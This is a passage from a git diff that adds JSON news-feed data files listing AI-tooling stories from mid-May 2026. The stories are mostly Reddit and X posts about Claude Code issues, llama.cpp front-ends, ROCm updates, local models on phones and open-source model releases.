GitHub: https://github.com/lemonade-sdk/lemonade Discord: https://discord.gg/5xXzkMu8Zk", + "category": "ai_models" + }, + { + "title": "Claude Code in VS Code keeps “answering” by freezing mid-stream, logs show sdk_stream_ended_no_result", + "url": "https://reddit.com/r/ClaudeAI/comments/1tenric/claude_code_in_vs_code_keeps_answering_by/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "developer_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "developer_tool" + ], + "importance": 0.9400000000000001, + "date": "2026-05-16T08:28:58.000Z", + "summary": "[error message on Claude extension for VS Code](https://preview.redd.it/08qtvuaamg1h1.png?width=910&format=png&auto=webp&s=6c2d4005bcdd6e5c058e5235b8d76b0512753ee6) I’m trying to use Claude Code in VS Code, but it has become almost unusable for larger tasks. The logs show Claude authenticates fine, sends the /v1/messages request, receives the first stream chunk, then the stream stalls. After about 30 seconds the UI reports an error with: eventName: \"sdk\\_stream\\_ended\\_no\\_result\", had\\_error: true It is not a simple auth/config failure: OAuth check completes, context window says OK, and the API stream opens. Smaller requests seem to work, but larger multi-part prompts repeatedly freeze with stream stall warnings like: \\[Stall\\] stream\\_idle\\_partial lastChunkAgeMs=15002 bytesTotal=669 idleDeadlineMs=300000 There are some unrelated MCP auth/config errors too, but the main issue is that Claude starts responding and then stops producing a usable answer. Has anyone else seen Claude Code/VS Code fail this way on large prompts? Is this a known streaming bug, server-side issue, or something caused by heavy tool/skill context?", + "category": "ai_tools" + }, + { + "title": "WSL can't reach Kobold.cpp running on Windows, even though the API works fine in PowerShell, SillyTavern & a Kenshi SentientSands Mod. 
Does anyone know the solution?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tf7f4d/wsl_cant_reach_koboldcpp_running_on_windows_even/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-16T22:24:17.000Z", + "summary": "Okay sorry for the slop below but I'm losing my mind with this and I'm hoping someone here has dealt with the same setup. (I asked the AI that let me copy&paste shit for 3 hours to summarise what it asked me to do) Here's the situation: * Kobold.cpp is running on Windows * The OpenAI-compatible API is on port 5001 * It works from PowerShell on Windows, SillyTavern and a Kenshi Mod (SentientSands) * But WSL cannot connect to it, even though it's the same machine Kobold.cpp starts normally and shows that the OpenAI-compatible API is running on `http://0.0.0.0:5001/v1/`. From **PowerShell**, this works fine: bash curl http://127.0.0.1:5001/v1/models and it returns the model list. 
From **WSL**, `pwd` works normally, but this fails: bash curl http://127.0.0.1:5001/v1/models with: bash curl: (7) Failed to connect to 127.0.0.1 port 5001 after 0 ms: Could not connect to server So at this point I know: * Kobold itself is running fine * The API endpoint is working on Windows * The actual problem is specifically WSL trying to reach a service hosted on the Windows side Things I already tried: * Binding Kobold to [`0.0.0.0`](http://0.0.0.0) instead of only localhost * Changing WSL config t…", + "category": "ai_models" + }, + { + "title": "I replicated Anthropic's Generator-Evaluator harness to build a website through 12 adversarial AI iterations - here's the result and what I learned", + "url": "https://reddit.com/r/ClaudeAI/comments/1tf76wp/i_replicated_anthropics_generatorevaluator/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "cli_tool" + ], + "matching_tags": [ + "mcp", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-16T22:14:25.000Z", + "summary": "Anthropic recently published their [harness design for long-running apps](https://www.anthropic.com/engineering/harness-design-long-running-apps) — a multi-agent architecture inspired by GANs where a Generator builds code and an Evaluator critiques it in a loop. I built my own version using Kiro CLI and used it to generate a marketing website for my project [Mnemo](https://github.com/Mnemo-mcp/Mnemo) (persistent memory for AI coding agents). **The architecture:** Planner (runs once) → Generator ↔ Evaluator (12 iterations) Each agent is a separate CLI process with zero shared context. They communicate only through files (spec.md, eval-report.md). The Evaluator uses Playwright to actually browse the live site — not just read code. **What made it work:** **Clean slate per invocation** — each agent starts fresh, reads only its input files. Prevents context anxiety. **Playwright MCP for testing** — the evaluator navigates, clicks, resizes viewports. 
Catches visual bugs code review never would. **Anthropic's frontend design skill** — explicitly penalizes generic AI patterns (Inter font, purple gradients, card layouts). Forces creative risk-taking. **Continuous iteration, not retry-on-fa…", + "category": "ai_tools" + }, + { + "title": "Interconnects newsletter reviews wave of open AI releasesOpen AI models saw a burst of new releases this month from several labs. The Interconnects newsletter reviewed five of them, including Gemma 4 and DeepSeek V4, using the CAISI V4 evaluation framework.", + "url": "https://www.digg.com/ai/09imapy5?rank=7", + "source": "Digg AI", + "tags": [ + "product_launch", + "developer_tool" + ], + "matching_tags": [ + "product_launch", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-16T20:04:50.938Z", + "summary": null, + "category": "ai_tools" + }, + { + "title": "How I started programming differently over the last year. What about you?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tf2cxh/how_i_started_programming_differently_over_the/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "cli_tool", + "agent_tool" + ], + "matching_tags": [ + "cli_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-16T18:58:05.000Z", + "summary": "An interesting observation: I’ve stopped using the LLM-powered autocomplete in my IDE. At first, it was one of the key features for me. It felt extremely convenient: you start writing a function in your code, and the LLM completes it based on common sense or the context from the open tabs. But the most interesting thing is that back when LLM autocomplete was useful and in demand, I had already written a script that could go through the source files, let me select what I needed, and prepare the context to feed into an LLM chat so it could tell me what to add or fix. I worked like that for about six months. And even that is gone now. These days it’s easier to open a CLI interface with a coding agent, without even launching the IDE. 
You describe what you need, use @ to point it to the files it should inspect or modify, and that’s it. Everything is changing at an absolutely insane speed. Basically, the only things I still use an IDE for are nice Git diff visualization, step-by-step debugging, and the ability to click on functions and jump into their implementation. In other words, code navigation. And even that functionality is only needed in about 5-10% of my work. It’s interesting t…", + "category": "ai_models" + }, + { + "title": "LLM Phone Home: Reliable Apps that can deliver inference from local backend", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tez9sb/llm_phone_home_reliable_apps_that_can_deliver/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-16T17:02:05.000Z", + "summary": "Hello all, I’m wondering what suggestions there are for an ios app that can serve an openai compatible endpoint. I am using 3sparks which works GREAT for that specific use, BUT, there is no mcp, no web search, etc. I want to show people that a local model with web search on your phone is very impressive, but I can’t find an app that can mimic OWUI/LMS/etc. Texting Hermes works but I was hoping to find a solution that is not using a slow agent, just calling requests from local server. So far, I tried: Apollo, Locally AI, Noema, and 3 Sparks. Previously I have gone through other apps that run models in situ (in the iphone) but they don’t have remote endpoint usage. 
Noema seemed promising but Deepseek V4 Flash from my mac studio never makes it through a request (works great with 3 Sparks, but no web search or mcp capability).", + "category": "ai_models" + }, + { + "title": "Frameo AI Launches Pixar-Style Short Films Powered by Seedance 2.0 — Native Audio, Multi-Shot, Director Mode", + "url": "https://x.com/frameo_ai/status/2055642282796400821", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "tool_update" + ], + "importance": 1, + "date": "2026-05-16T14:56:25.012Z", + "summary": "Frameo AI launched Pixar-quality short films on Seedance 2.0 with native audio and Director Mode, making cinematic AI video creation accessible to independent creative producers.", + "category": "ai_tools" + }, + { + "title": "How Do You Tell If Someone Is Good at Agents? — Scoble Asks the Question the AI Industry Cannot Answer", + "url": "https://x.com/Scobleizer/status/2055566706714845328", + "source": "Aligned News (Scoble)", + "tags": [ + "developer_tool", + "agent_tool" + ], + "matching_tags": [ + "developer_tool", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-16T14:52:06.433Z", + "summary": "Scoble's question on evaluating agent development talent surfaces the unsolved hiring signal problem as companies scramble for AI agent skills with no reliable credential or assessment framework.", + "category": "ai_tools" + }, + { + "title": "Qwen3.6-35B-A3B and 9B are officially on the public Terminal-Bench 2.0 leaderboard!", + "url": "https://reddit.com/r/LocalLLaMA/comments/1temio0/qwen3635ba3b_and_9b_are_officially_on_the_public/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-16T07:19:25.000Z", + "summary": "Qwen3.6-35B-A3B and 9B are officially on the public Terminal-Bench 2.0 leaderboard! 
little-coder × Qwen3.6-35B-A3B hit 24.6% (±3.2), and **now land above Gemini 2.5 Pro on Gemini CLI (19.6%)** and Qwen3-Coder-480B on Terminus 2 (23.9%). I didn’t expect the scaffold-model gap from Polyglot to hold on a benchmark this hard but it did! little-coder × Qwen3.5-9B came in at 9.2% which is more humble. Yet, it also shows again that **sub-10B local models are now measurable on a hard agentic benchmark**, not assumed unworthy of a slot. Just felt it was right to follow up here as you requested, and say a genuine thanks to this community. It really is the place currently driving innovation toward less compute, and this run exists there because you pushed for it. Now it’s time to head for the top of the leaderboard 👀 let’s go open source!", + "category": "ai_models" + }, + { + "title": "Claude in Chrome extension stopped working in claude.ai after using Claude Code — anyone else?", + "url": "https://reddit.com/r/ClaudeAI/comments/1teudps/claude_in_chrome_extension_stopped_working_in/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.88, + "date": "2026-05-16T13:55:37.000Z", + "summary": "Hey everyone, running into a weird issue and hoping someone has seen this before. A few hours ago, Claude in Chrome was working fine in the claude.ai web app. Then I started using Claude Code (CLI) with the \\`--chrome\\` flag, which connected to the extension no problem. Ever since, the extension refuses to connect from claude.ai — but it still works fine from Claude Code and the extension itself appears active and logged in. 
\\*\\*Setup:\\*\\* \\- Claude in Chrome extension installed and signed in \\- Same account on [claude.ai](http://claude.ai) and Claude Code \\- Extension shows as active in Chrome toolbar \\*\\*What works:\\*\\* \\- ✅ Claude Code CLI (\\`claude --chrome\\`) connects to the browser fine \\- ✅ Extension itself appears active and logged in \\- ❌ [claude.ai](http://claude.ai) web app: consistently returns \"Browser extension is not connected\" \\*\\*What I've already tried (nothing helped):\\*\\* \\- Restarted Chrome \\- Restarted PC \\- Logged out and back into [claude.ai](http://claude.ai) \\- Disabled and re-enabled the extension My theory: once Claude Code connected to the extension, it somehow \"claimed\" the connection and the [claude.ai](http://claude.ai) web app can no longer get thr…", + "category": "ai_tools" + }, + { + "title": "Free Premiere Pro extension to download YouTube/Instagram/X videos and auto-import to your project bin", + "url": "https://reddit.com/r/ClaudeAI/comments/1tf20ta/free_premiere_pro_extension_to_download/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 0.78, + "date": "2026-05-16T18:45:19.000Z", + "summary": "Tired of the whole workflow — open browser, find video, download, wait, drag into Premiere. So I built a panel that does it all from inside Premiere. Paste a URL, pick quality, click Download & Import — file lands directly in your project bin. Supports: \\- YouTube, Instagram, X/Twitter \\- Best / 1080p / 720p / 480p / MP3 \\- Live progress bar with ETA \\- Auto-import to project bin on finish Powered by yt-dlp under the hood. Built this with the help of Claude (AI) — had the idea and kept iterating until it worked. Free & open source: [https://github.com/gitttsarya/media-fetcher-premiere](https://github.com/gitttsarya/media-fetcher-premiere) Full install guide in the README. Let me know if you run into any issues! 
https://preview.redd.it/y5svnpjuoj1h1.png?width=482&format=png&auto=webp&s=0dfb391daefb06dbbb37c4b13174efc6a1ca7a22", + "category": "ai_tools" + }, + { + "title": "Using Claude chat for making Apps.", + "url": "https://reddit.com/r/ClaudeAI/comments/1teum62/using_claude_chat_for_making_apps/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.78, + "date": "2026-05-16T14:05:01.000Z", + "summary": "I have been using Claude chat to build structural engineering calculation apps, and it has worked very well for me. Claude generates the files, and I host the projects on GitHub. To avoid hitting the context window limit, I periodically start new chat sessions. When I do, I download the ZIP file from GitHub (including the MD file), and paste it into the new chat so Claude has the project context again. I was wondering if there are any drawbacks to working this way. I do not use Claude Code (don’t have coding background )or the terminal much. I tried it once but did not really like the workflow. 
Most of my coding is done on the go through the chat interface on my phone or on my computer at work and at home.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-17.json b/data/news-feed-2026-05-17.json new file mode 100644 index 0000000..75d5bae --- /dev/null +++ b/data/news-feed-2026-05-17.json @@ -0,0 +1,267 @@ +{ + "generated": "2026-06-05T00:44:40.711Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-17", + "article_count": 15, + "archived_story_count": 420, + "articles": [ + { + "title": "I built SeeFlow - architecture diagrams that actually run, wired to your live app", + "url": "https://reddit.com/r/ClaudeAI/comments/1tfd6j6/i_built_seeflow_architecture_diagrams_that/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "open_source", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "mcp", + "open_source", + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-17T02:50:20.000Z", + "summary": "Architecture diagrams rot. You spend an afternoon in Confluence, three months later it's wrong, and nobody updates it because there's no forcing function. https://preview.redd.it/9svmg8ih3m1h1.png?width=2508&format=png&auto=webp&s=0d06df1f82fd417ee9a45e504efd26628eaf33fd SeeFlow tries to fix that by making diagrams executable. It generates a flow canvas from your codebase, then wires each node to your actual running app. There's a Claude Code / Codex/ Cursor / Windsurf plugin that does the heavy lifting: >/seeflow show me the shopping cart feature It also ships an MCP server so any MCP-aware editor can register and edit demos without leaving the IDE. 
Link to the site: [https://seeflow.dev](https://seeflow.dev) 100% Free/ MIT Open Source", + "category": "ai_tools" + }, + { + "title": "ROCm 7.13 nightly adds strix halo optimizations", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tftg09/rocm_713_nightly_adds_strix_halo_optimizations/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch", + "open_source", + "tool_update" + ], + "matching_tags": [ + "product_launch", + "open_source", + "tool_update" + ], + "importance": 1, + "date": "2026-05-17T15:56:56.000Z", + "summary": "[https://www.phoronix.com/news/ROCm-7.13-Released](https://www.phoronix.com/news/ROCm-7.13-Released) Quote: ...new optimizations for Ryzen AI Max 300 \"Strix Halo\" and the ROCprof Trace Decoder is now open-source...<snip>... Those rolling from source can grab the ROCm 7.13 Tech Preview via [TheRock on GitHub](https://github.com/ROCm/TheRock/releases/tag/therock-7.13). [https://rocm.docs.amd.com/en/7.13.0-preview/about/release-notes.html](https://rocm.docs.amd.com/en/7.13.0-preview/about/release-notes.html) Trivia: Rocm name origin: radeon open compute module", + "category": "ai_models" + }, + { + "title": "I updated my tool that turns any book into character & landscape images using RAG + ComfyUI/Gemini — now with Locations support!", + "url": "https://reddit.com/r/StableDiffusion/comments/1tfro2h/i_updated_my_tool_that_turns_any_book_into/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "open_source", + "tool_update" + ], + "matching_tags": [ + "api_update", + "open_source", + "tool_update" + ], + "importance": 0.78, + "date": "2026-05-17T14:51:01.000Z", + "summary": "Hey everyone! I am back with an update to my character generation tool. I got some great feedback when I posted it here, I am pleased to announce that I have integrated a lot of requested features and added a lot more ! 
**Big thanks to everyone who tried the tool from the first post and gave valuable suggestions !** All the updates and features for just 2.99 a month ! No, just kidding, still fully open source. **Image gallery -** Modern Dracula adaptation, plus some characters from the Eye of the world ( which inspired this whole project ). Tool screenshots at the end. # What's new in this update? # 🔧 QoL updates ! Configurable .env file, api endpoints for Ollama, OpenAI etc, database for books generated, character details saved after generation, image gallery, prompt save feature, installer, updated UI, support for epub/text, Gemini image integration, collapsible sidebars, task manager widget, debug panel to test connections or databases, and tons more # 📍 Locations Tab — \"The one I didn't know I needed\" This was the exciting one. You can now generate **landscape/architectural images** for prominent locations in the book — not just characters. * Click **\"Extract Locations from…", + "category": "creative_tools" + }, + { + "title": "Are local models good enough yet for AI meeting memory?", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tfukyl/are_local_models_good_enough_yet_for_ai_meeting/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "mcp", + "tool_update" + ], + "matching_tags": [ + "mcp", + "tool_update" + ], + "importance": 1, + "date": "2026-05-17T16:38:58.000Z", + "summary": "I’ve been testing different ways to handle AI meeting notes and realized the most useful part isn’t the summary, it’s having searchable context from past meetings later. Right now I’m using Bluedot because it handles capture really well, transcripts, summaries, action items, recordings, all searchable after. The new Claude MCP integration made me realize how valuable meeting history becomes once you can actually query it naturally. 
Are you building local AI meeting memory setups, or are cloud tools still way ahead for this use case?", + "category": "ai_models" + }, + { + "title": "NeuralCompanion", + "url": "https://reddit.com/r/StableDiffusion/comments/1tftqwg/neuralcompanion/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "open_source" + ], + "matching_tags": [ + "api_update", + "open_source" + ], + "importance": 1, + "date": "2026-05-17T16:07:34.000Z", + "summary": "NeuralCompanion is an open-source, local-first AI companion project for people who like building, experimenting, and seeing how far personal AI can go on their own hardware. It brings together realtime voice chat, local LLMs, TTS/STT, image generation, interactive tutorials, API-friendly workflows, and a modular addon system into one desktop app designed to be flexible, hackable, and genuinely fun to explore. NC also supports avatar systems and avatar engines like VSeeFace, VAM/VAM2, and other experimental realtime avatar workflows. It is still experimental and a little rough around the edges in places, but that is part of the project. The goal is not to make another locked-down corporate assistant. It is to build a customizable AI companion platform you can actually run, modify, and shape yourself. If you are into local AI, creative tools, avatars, plugins, voice interfaces, automation, or weird future-facing software, come take a look. 
GitHub: [https://github.com/Rakile/NeuralCompanion](https://github.com/Rakile/NeuralCompanion) Discord: [https://discord.com/invite/UqnwX46rcK](https://discord.com/invite/UqnwX46rcK) Developers, tinkerers, artists, AI enthusiasts, and curious peop…", + "category": "creative_tools" + }, + { + "title": "Made a simple template manager and GUI for llama.cpp so I don't have to keep memorizing CLI flags.", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tfqrbt/made_a_simple_template_manager_and_gui_for/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "product_launch", + "cli_tool" + ], + "matching_tags": [ + "product_launch", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-17T14:15:45.000Z", + "summary": "[Introducing Hexllama](https://reddit.com/link/1tfqrbt/video/uobdgqq1hp1h1/player) Hey, I’ve always found **llama-server** to be more than enough for testing out local models, mostly because it guarantees you always have the absolute latest llama.cpp features and architecture support. But keeping track of different CLI commands, context sizes, and batch settings for different models was becoming a massive headache. Plus, managing multiple terminal tabs when I wanted to run two models at once was annoying. So, I built **Hexllama**. It's a fast desktop interface that gets out of your way and just makes managing llama.cpp easier. No walled gardens, just a clean wrapper. **What it actually does:** * **Template-Based Execution:** You configure your CLI flags (threads, context, etc.) once via a visual editor, save it as a template, and from then on it’s just one click to run. * **Built-in llama.cpp Version Manager:** This is the feature I use the most. It auto-checks the ggml-org repo, lets you download new releases directly in the app, and lets you swap backends instantly (super useful when a new model architecture drops and needs a specific build). 
* **Integrated HF Downloader:** Sear…", + "category": "ai_models" + }, + { + "title": "Kimi K 2.6 is good and can get free api keys from Nvidia integrate with aider launch in powershell and you got something same as claude code for testing new ideas before paying for claude subscription", + "url": "https://x.com/lordsa_m/status/2055959075012104631", + "source": "X search / AI model updates", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-17T10:30:16.000Z", + "summary": "Kimi K 2.6 is good and can get free api keys from Nvidia integrate with aider launch in powershell and you got something same as claude code for testing new ideas before paying for claude subscription", + "category": "ai_models" + }, + { + "title": "Is there a new Wan2.2 lightx2v (20260412) FP8 version for ComfyUI?", + "url": "https://reddit.com/r/StableDiffusion/comments/1tfkwx7/is_there_a_new_wan22_lightx2v_20260412_fp8/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 1, + "date": "2026-05-17T09:43:32.000Z", + "summary": "I decided to check the `lightx2v` Hugging Face account and noticed they released an updated version of their distilled Wan2.2 i2v A14b model about a month ago. They uploaded a new version 20260412 on Hugging Face, \"Wan2.2-Distill-Models\" repository. (Can't post a link because Reddit filters block the post) However, they only uploaded the FP32 version, which is also incompatible with ComfyUI. I can't find a converted version via Google or Hugging Face search. 
Does anyone know how to convert this model to FP8, or would someone be willing to convert it and upload it?", + "category": "creative_tools" + }, + { + "title": "Jackrong/Qwopus3.5-9B-Coder-GGUF · Hugging Face", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tfin40/jackrongqwopus359bcodergguf_hugging_face/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-17T07:33:35.000Z", + "summary": ">**Qwopus3.5-9B-coder** is specially optimized and fine-tuned for high-performance **🤖 Agentic Coding, complex Tool Calling, and logical reasoning.** >*💡* ***Why the 9B Dense Model?*** *We believe that the 9B dense architecture represents the perfect* ***\"sweet spot\"*** *for large language models. It runs seamlessly at 8-bit precision on entry-level 16GB RAM devices—such as standard laptops and the Mac mini—making it exceptionally lightweight yet highly versatile. Without requiring expensive hardware, it allows you to achieve excellent performance paired with impressive inference speeds. Simply put,* ***Qwen3.5-9B is currently the best open-source model in its class.*** # 🛠 Training Strategy The fine-tuning process of this model deeply integrates **Trace Inversion** data augmentation technology with high-quality **Agent Traces**. This systematic approach not only strengthens the model's ability to solve complex programming tasks, but also greatly improves its logical coherence and accuracy when using various tools. This model is designed specifically for the following goals: * 🧩 More structured and stronger logical reasoning capabilities, reducing repetitive thinking * �…", + "category": "ai_models" + }, + { + "title": "2026.5.16 released. 
Highlights: - xAI Grok via SuperGrok OAuth provides 1M token context window - OpenAI‑compatible local proxy allows any OAuth‑authored provider to speak the OpenAI API Full release notes:", + "url": "https://x.com/OliverB72157882/status/2055972796711502049", + "source": "X search / AI model updates", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 0.9800000000000001, + "date": "2026-05-17T11:24:47.000Z", + "summary": "2026.5.16 released. Highlights: - xAI Grok via SuperGrok OAuth provides 1M token context window - OpenAI‑compatible local proxy allows any OAuth‑authored provider to speak the OpenAI API Full release notes:", + "category": "ai_models" + }, + { + "title": "I ran 100 Claude + Codex sessions in parallel to understand what I'm doing wrong in marketing my open source \"Claude Command Center\". Here's the playbook they came up with.", + "url": "https://reddit.com/r/ClaudeAI/comments/1tfbxmf/i_ran_100_claude_codex_sessions_in_parallel_to/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "tool_update" + ], + "matching_tags": [ + "open_source", + "tool_update" + ], + "importance": 0.9400000000000001, + "date": "2026-05-17T01:50:08.000Z", + "summary": "A week ago I launched my open-source project (Claude Control Center) on this subreddit. Got 0 upvotes. Dead in 5 hours. :) \\[The app is awesome - great way to manage multiple sessions and avoid waiting on top of Claude + Codex - try it :) [git:amirfish1/ccc](http://github.com/amirfish1/claude-command-center) . So I spawned **100 Claude + Codex agents** in parallel and asked them to figure out what I did wrong (It had two hours left on my weekly Claude limit and 20% left - tried to think of good use :) ) . 30 minutes and 100 artifacts later, they handed me back a playbook. https://reddit.com/link/1tfbxmf/video/0mi1ytksol1h1/player The headline finding: stars don't come from better code. They come from: marketing surface. 
Tagline, demo GIF, founder credential, hosted landing page, multi-shot Hacker News, awesome-list inclusion. The system found that gap on its own - I never told it to study marketing. 5-min video walking through the 7 findings + what the agents drafted (Show HN body, X thread, LinkedIn post, channel plan): [https://youtu.be/Tm2svTe\\_Ed4](https://youtu.be/Tm2svTe_Ed4) The video itself - is \\*ON PURPOSE\\* 100% built by the AI who created the agents \\[happy to share th…", + "category": "ai_tools" + }, + { + "title": "Claude Code context-window: /clear after EVERY task in the codebase or are there edge cases?", + "url": "https://reddit.com/r/ClaudeAI/comments/1tfnqmc/claude_code_contextwindow_clear_after_every_task/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 0.54, + "date": "2026-05-17T12:08:39.000Z", + "summary": "So I have been recently coding a bunch with the following setup: I am launching Claude Code CLI inside of my repo (a complete shopify theme; if you are unfamiliar it is 3-8mb of source code, structurally something like this: `layout/ 2–3 files (theme.liquid = root shell)` `templates/ 15–25 files (one per page type, JSON or liquid)` `sections/ 30–50 files (reusable page blocks)` `snippets/ 20–40 files (sub-components, like partials)` `assets/ 30–60 files (css, js, svgs)` `locales/ 5–10 files (i18n JSON)` `config/ 2 files (settings_schema.json = theme editor config)` ) I also have an app set up that shows, what the current usage of the models context windows is currently at in %. 
**Recently I have been wondering: say I give claude quite a heavy task that involves the typical stack of 3 files (1 .js, 1 .liquid and 1 .css) and this instantly bumps up the context window from 0% to 10%, is there a golden rule that one should always do /clear after such an extensive task or does it depend if say, the next task depends on the same 3 files?** Do you guys have any advice on when the perfect time is to /clear? What are your experiences with this? Do you know of any addons that could facilita…", + "category": "ai_tools" + }, + { + "title": "LLM's on Android (Snapdragon 8 Elite) MOE Experience", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tg3ssd/llms_on_android_snapdragon_8_elite_moe_experience/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "developer_tool" + ], + "matching_tags": [ + "developer_tool" + ], + "importance": 1, + "date": "2026-05-17T22:22:53.000Z", + "summary": "So I bought a phone with Snapdragon 8 elite (gen 4) and 24GB ram (Honor magic 7 pro). My experience has been mixed but with solid potential. Hexagon (Snapdragon 8 Elite) NPU and OpenclGPU support and updates have been rolling in fast but still the fastest prompt processing and token generation have mostly been CPU (I would bet that soon enough either NPU or GPU will be faster or more realistically both). CPU has the downside of generating more heat than NPU and GPU inference but overall it's still the fastest **currently**. Now there are no phones with 32gb ram without a virtual ram extension which doesn't work with LLM's ofc, so the best you will do is 24gb ram. What can you do with 24gb ram and a smartphone processor though? Quite a lot actually, MOE has been getting quite popular and their Q4 quants of these models are great and fit into the 24GB. My personal recommendation is IQ4\\_XS and MXFP4\\_MOE since with what I have tested MXFP4\\_MOE is quite faster but for the size IQ4\\_XS can't be beaten. 
Q4\\_0 is more optimised but quality wise it's worse than both (subjectively from my own experience). Goes without saying but Q4\\_K\\_M is also quite reliable from a speed/quality/size s…", + "category": "ai_models" + }, + { + "title": "While waiting for Fara-1.5 for my coding harness", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tg3kbz/while_waiting_for_fara15_for_my_coding_harness/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-05-17T22:13:11.000Z", + "summary": "Hi all, Not sure many people are aware so wanted to give a word about [Fara-1.5 release](https://www.microsoft.com/en-us/research/video/magenticlite-a-full-stack-agentic-experience-powered-by-small-models/). => this release will likely be the big sister of [Fara-7B](https://huggingface.co/bartowski/microsoft_Fara-7B-GGUF) and built on top of Qwen3.5 Actual Fara-7B performs not bad at all but actually requires a proper implementation, and I really hope the 1.5 will be SOTA, in different (including smaller) versions, and may simplify all the pipeline! I gave my coding agent harness extra built-in features: * browser automation tool allowing navigation either via accessibility tree only (CDP / DOM) or via vision + grounding (the above video uses Qwen3.6 35B + Fara-7B) * the possibility to generate prefilled \"skills\" directly from conversation history + Jobs to schedule auto-run * recording from user actions (requires vllm for video and maybe llama.cpp following [this PR](https://github.com/ggml-org/llama.cpp/pull/21858)?) 
Feel free to have a look at the project, it is focused on controllability and low context footprint: [https://github.com/leflakk/openclose](https://github.com/le…", + "category": "ai_models" + }, + { + "title": "Pushing the limit: minimax m2.7 q8_0 128k on 2x3090, 256GB DDR4", + "url": "https://reddit.com/r/LocalLLaMA/comments/1tg37t6/pushing_the_limit_minimax_m27_q8_0_128k_on_2x3090/", + "source": "Reddit r/LocalLLaMA", + "tags": [ + "agent_tool" + ], + "matching_tags": [ + "agent_tool" + ], + "importance": 1, + "date": "2026-05-17T21:59:27.000Z", + "summary": "CPU is just a secondhand 10900x. Using 128k context, unquantized kv cache. Model is at q8\\_0 to mitigate some weird behavior I was seeing at lower quants. Speed is very slow at around 50tps pp, 10tps tg, but usable for coding agent workflows. Anybody else running MoE models in this size class on relatively low-end hardware? For my purposes, speed is less important than accuracy, as long as it's not like literally all day. Any other models you'd recommend I'd try or additional optimization tips that could help within my constraints? I wish they'd released the draft model for MTP on this model but it looks like they declined to do so for 2.7. 
